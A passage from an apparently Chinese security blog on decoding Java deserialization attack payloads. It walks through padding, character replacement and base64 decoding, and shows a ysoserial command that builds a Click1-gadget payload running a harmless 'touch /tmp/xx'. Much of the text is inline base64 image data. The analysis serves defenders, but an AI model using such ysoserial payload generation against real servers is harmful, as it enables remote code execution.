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
|
|||
|
|
<p blockindex=18>以<code>cafebabe</code>开头,java class文件的16进制,保存成class,拖到idea中反编译即可。</p>
|
|||
|
|
<h2 blockindex=19>0x03 编码替换的Payload</h2>
|
|||
|
|
<p blockindex=20>我们在日常分析的时候,java反序列化的漏洞,可能看到的是下面的<code>AKztAAV</code>开头的Payload,对于这类Payload的解码流程,基本上就是先补等号,替换<code>_</code>和<code>-</code>为<code>/</code>和<code>+</code>,然后base64解码,跳过开头的空字符,最后的结果丢给zkar解析就行。如果zkar解析出来有看到<code>ca fe</code>开头的十六进制,就把它提取出来,保存成class文件,最后将class文件丢给idea反编译,即可看到攻击者最终想要执行的命令了。有点乱?没关系,下面我们会一步步分析。</p>
|
|||
|
|
<p blockindex=21><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=22>这种Payload 一般执行如下命令:</p>
|
|||
|
|
<pre blockindex=23><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> | (<span class=hljs-built_in>echo</span> -ne \\x00 && cat) | base64 | tr <span class=hljs-string>'/+'</span> <span class=hljs-string>'_-'</span> | tr -d <span class=hljs-string>'='</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=24>命令的意思是,使用<code>ysoserial.jar</code>生成一个指定<code>Click1</code>这个gadget 去执行<code>touch /tmp/xx</code>命令的序列化的Payload,然后在该Payload的前面插入一个空字节(<code>\x00</code>),之后对其进行base64编码,编码后的内容,将<code>/</code> 替换为 <code>_</code>,和 <code>+</code> 替换为 <code>-</code>,最后将<code>=</code>去掉。</p>
|
|||
|
|
<p blockindex=25>> 替换<code>/</code>和<code>+</code>是因为 base64 编码的输出可能包含 <code>/</code> 和 <code>+</code> 字符,这些字符在 URL 中有特殊含义,因此需要替换成其他字符以避免问题。</p>
|
|||
|
|
<p blockindex=26>拆开如下:</p>
|
|||
|
|
<pre blockindex=27><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> > raw_payload.bin
|
|||
|
|
cat raw_payload.bin | (<span class=hljs-built_in>echo</span> -ne \\x00 && cat) > raw_payload_00.bin
|
|||
|
|
cat raw_payload_00.bin | base64 > raw_payload_00_base64.bin
|
|||
|
|
cat raw_payload_00_base64.bin | tr <span class=hljs-string>'/+'</span> <span class=hljs-string>'_-'</span> | tr -d <span class=hljs-string>'='</span> > raw_payload_00_base64_replace.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=28>因此,我们反着来,即可一步步还原,先处理第四步,替换和等号的问题,等号需要根据字符串长度补充</p>
|
|||
|
|
<pre blockindex=29><code class="hljs language-bash">cat raw_payload_00_base64_replace.bin | tr <span class=hljs-string>'_-'</span> <span class=hljs-string>'/+'</span> > restore_raw_payload_00_base64_replace_lack_equal.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=30>然后执行下面的shell脚本</p>
|
|||
|
|
<pre blockindex=31><code class="hljs language-bash"><span class=hljs-meta>#!/bin/bash</span>
|
|||
|
|
|
|||
|
|
file_content=$(cat restore_raw_payload_00_base64_replace_lack_equal.bin)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 移除可能存在的换行符</span>
|
|||
|
|
base64_string=$(<span class=hljs-built_in>echo</span> -n <span class=hljs-string>"<span class=hljs-variable>$file_content</span>"</span> | tr -d <span class=hljs-string>'\n'</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算base64编码字符串长度</span>
|
|||
|
|
length=<span class=hljs-variable>${#base64_string}</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算需要补充的等号数量</span>
|
|||
|
|
remainder=$((length % <span class=hljs-number>4</span>))
|
|||
|
|
padding=$(((<span class=hljs-number>4</span> - remainder) % <span class=hljs-number>4</span>))
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 补充等号</span>
|
|||
|
|
<span class=hljs-keyword>if</span> ((padding &gt; 0)); <span class=hljs-keyword>then</span>
|
|||
|
|
padding_string=$(<span class=hljs-built_in>printf</span> <span class=hljs-string>'=%.0s'</span> $(seq 1 <span class=hljs-variable>$padding</span>))
|
|||
|
|
base64_string=<span class=hljs-string>"$base64_string<span class=hljs-variable>$padding_string</span>"</span>
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"<span class=hljs-variable>$base64_string</span>"</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=32><code class="hljs language-bash">./add_equal.sh > restore_raw_payload_00_base64_replace.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=33>这时候我们可以比对一下,看看是否还原成功</p>
|
|||
|
|
<p blockindex=34><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=35>接下来开始还原第三步,base64解码即可:</p>
|
|||
|
|
<pre blockindex=36><code class="hljs language-bash">cat restore_raw_payload_00_base64_replace.bin | base64 -d > restore_raw_payload_00.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=37><img src=data:image/png;base64,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